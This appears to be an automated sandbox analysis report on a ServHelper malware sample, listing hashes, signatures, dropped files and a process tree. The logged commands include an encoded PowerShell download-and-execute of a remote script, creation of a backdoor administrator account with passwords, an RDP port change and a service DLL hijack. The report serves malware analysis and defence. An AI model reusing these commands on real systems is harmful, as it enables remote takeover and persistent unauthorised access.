Analysis
max time kernel: 60s
max time network: 121s
platform: windows10_x64
resource: win10v20210408
submitted: 14-08-2021 06:42

Static task: static1
Behavioral task: behavioral1
Sample: 472208d7ba18d4c14b7e90b9db5d6feb.exe
Resource: win7v20210410
Behavioral task: behavioral2
Sample: 472208d7ba18d4c14b7e90b9db5d6feb.exe
Resource: win10v20210408

General
Target: 472208d7ba18d4c14b7e90b9db5d6feb.exe
Size: 5.9MB
MD5: 472208d7ba18d4c14b7e90b9db5d6feb
SHA1: ff24cc43998ff99e61b1a838e1d51c4888498935
SHA256: ae1c9d454905ed43654f99b1ea1e8ecc3ae08eb75c3860f46b285ce724ae5e4d
SHA512: 9ce72c4da799273ae13008c0033c3d0638f224042ae3bb7910ffb5f59a64babbcd8039468b0a94b8fa5f3192f543a59f493878ade5233d9958d874d59a1e1a15

Malware Config
Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
- suricata: ET MALWARE ServHelper CnC Inital Checkin
- Grants admin privileges (1 TTPs)
Uses net.exe to modify the user's privileges.
- Blocklisted process makes network request (9 IoCs)
Processes:
flow pid process
17 2644 powershell.exe
19 2644 powershell.exe
20 2644 powershell.exe
21 2644 powershell.exe
23 2644 powershell.exe
25 2644 powershell.exe
27 2644 powershell.exe
29 2644 powershell.exe
31 2644 powershell.exe
- Modifies RDP port number used by Windows (1 TTPs)
- Sets DLL path for service in the registry (2 TTPs)
Processes:
resource yara_rule
\Windows\Branding\mediasrv.png upx
\Windows\Branding\mediasvc.png upx
- Loads dropped DLL (2 IoCs)
Processes:
pid process
2404 2404
- Drops file in Program Files directory (4 IoCs)
Processes:
description ioc process
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe
- Drops file in Windows directory (19 IoCs)
Processes:
description ioc process
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe
File opened for modification C:\Windows\branding\Basebrd powershell.exe
File opened for modification C:\Windows\branding\ShellBrd powershell.exe
File opened for modification C:\Windows\branding\mediasvc.png powershell.exe
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_pvik2n51.1ly.psm1 powershell.exe
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID084.tmp powershell.exe
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID162.tmp powershell.exe
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID182.tmp powershell.exe
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe
File created C:\Windows\branding\mediasrv.png powershell.exe
File created C:\Windows\branding\mediasvc.png powershell.exe
File created C:\Windows\branding\wupsvc.jpg powershell.exe
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe
File opened for modification C:\Windows\branding\mediasrv.png powershell.exe
File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID103.tmp powershell.exe
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_1uszuvw3.ucx.ps1 powershell.exe
File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID0F3.tmp powershell.exe
- Modifies data under HKEY_USERS (64 IoCs)
Processes: powershell.exe, WMIC.exe
- Modifies registry key (1 TTPs, 1 IoCs)
- Runs net.exe
- Script User-Agent (4 IoCs)
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc
HTTP User-Agent header 19 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header 20 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header 21 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header 23 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- Suspicious behavior: EnumeratesProcesses (18 IoCs)
Processes:
pid process
4004 powershell.exe
4004 powershell.exe
4004 powershell.exe
3856 powershell.exe
3856 powershell.exe
3856 powershell.exe
2212 powershell.exe
2212 powershell.exe
2212 powershell.exe
1152 powershell.exe
1152 powershell.exe
1152 powershell.exe
4004 powershell.exe
4004 powershell.exe
4004 powershell.exe
2644 powershell.exe
2644 powershell.exe
2644 powershell.exe
- Suspicious behavior: LoadsDriver (2 IoCs)
Processes:
pid process
628 628
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes: 472208d7ba18d4c14b7e90b9db5d6feb.exe, powershell.exe (PIDs 3728, 4004, 3856, 2212, 1152)
- Suspicious use of WriteProcessMemory (64 IoCs)
Processes: 472208d7ba18d4c14b7e90b9db5d6feb.exe, powershell.exe, csc.exe, net.exe, cmd.exe (parent/child pairs are shown in the process tree below)
Processes
Format: [tree depth] image path (PID), followed by the command line and the signatures that process triggered.

[1] C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe (PID 3728)
    cmd: "C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe"
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4004)
      cmd: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      - Drops file in Windows directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (PID 2116)
        cmd: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\upn5lb25\upn5lb25.cmdline"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (PID 2660)
          cmd: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7862.tmp" "c:\Users\Admin\AppData\Local\Temp\upn5lb25\CSC3921219BA57B4BDFB8B9BD17D4357878.TMP"
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3856)
        cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2212)
        cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1152)
        cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\reg.exe (PID 1612)
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    [3] C:\Windows\system32\reg.exe (PID 2688)
        cmd: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
        - Modifies registry key
    [3] C:\Windows\system32\reg.exe (PID 3944)
        cmd: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    [3] C:\Windows\system32\net.exe (PID 2128)
        cmd: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\net1.exe (PID 1516)
          cmd: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    [3] C:\Windows\system32\cmd.exe (PID 1948)
        cmd: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe (PID 580)
          cmd: cmd /c net start rdpdr
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\net.exe (PID 3868)
            cmd: net start rdpdr
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\system32\net1.exe (PID 968)
              cmd: C:\Windows\system32\net1 start rdpdr
    [3] C:\Windows\system32\cmd.exe (PID 2372)
        cmd: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe (PID 1768)
          cmd: cmd /c net start TermService
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\net.exe (PID 2448)
            cmd: net start TermService
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\system32\net1.exe (PID 1264)
              cmd: C:\Windows\system32\net1 start TermService
    [3] C:\Windows\system32\cmd.exe (PID 2688)
        cmd: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    [3] C:\Windows\system32\cmd.exe (PID 1612)
        cmd: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

[1] C:\Windows\System32\cmd.exe (PID 2312)
    cmd: cmd /C net.exe user WgaUtilAcc 000000 /del
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe (PID 2848)
      cmd: net.exe user WgaUtilAcc 000000 /del
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe (PID 2288)
        cmd: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

[1] C:\Windows\System32\cmd.exe (PID 4012)
    cmd: cmd /C net.exe user WgaUtilAcc udj4QYwQ /add
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe (PID 3856)
      cmd: net.exe user WgaUtilAcc udj4QYwQ /add
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe (PID 2004)
        cmd: C:\Windows\system32\net1 user WgaUtilAcc udj4QYwQ /add

[1] C:\Windows\System32\cmd.exe (PID 1096)
    cmd: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe (PID 580)
      cmd: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe (PID 2112)
        cmd: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

[1] C:\Windows\System32\cmd.exe (PID 2676)
    cmd: cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe (PID 2084)
      cmd: net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe (PID 3780)
        cmd: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD

[1] C:\Windows\System32\cmd.exe (PID 2312)
    cmd: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe (PID 2656)
      cmd: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe (PID 2004)
        cmd: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

[1] C:\Windows\System32\cmd.exe (PID 2548)
    cmd: cmd /C net.exe user WgaUtilAcc udj4QYwQ
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe (PID 1948)
      cmd: net.exe user WgaUtilAcc udj4QYwQ
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe (PID 2672)
        cmd: C:\Windows\system32\net1 user WgaUtilAcc udj4QYwQ

[1] C:\Windows\System32\cmd.exe (PID 3240)
    cmd: cmd.exe /C wmic path win32_VideoController get name
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\Wbem\WMIC.exe (PID 2676)
      cmd: wmic path win32_VideoController get name

[1] C:\Windows\System32\cmd.exe (PID 1480)
    cmd: cmd.exe /C wmic CPU get NAME
  [2] C:\Windows\System32\Wbem\WMIC.exe (PID 2288)
      cmd: wmic CPU get NAME
      - Modifies data under HKEY_USERS

[1] C:\Windows\System32\cmd.exe (PID 4080)
    cmd: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  [2] C:\Windows\system32\cmd.exe (PID 2388)
      cmd: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2644)
        cmd: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
        - Blocklisted process makes network request
        - Drops file in Program Files directory
        - Drops file in Windows directory
        - Modifies data under HKEY_USERS
        - Suspicious behavior: EnumeratesProcesses

[1] C:\Windows\System32\cmd.exe (PID 1628)
    cmd: cmd.exe /C net user wgautilacc 111213&net user wgautilacc /active:yes
  [2] C:\Windows\system32\net.exe (PID 2312)
      cmd: net user wgautilacc 111213
    [3] C:\Windows\system32\net1.exe (PID 2548)
        cmd: C:\Windows\system32\net1 user wgautilacc 111213
  [2] C:\Windows\system32\net.exe (PID 3620)
      cmd: net user wgautilacc /active:yes
    [3] C:\Windows\system32\net1.exe (PID 2208)
        cmd: C:\Windows\system32\net1 user wgautilacc /active:yes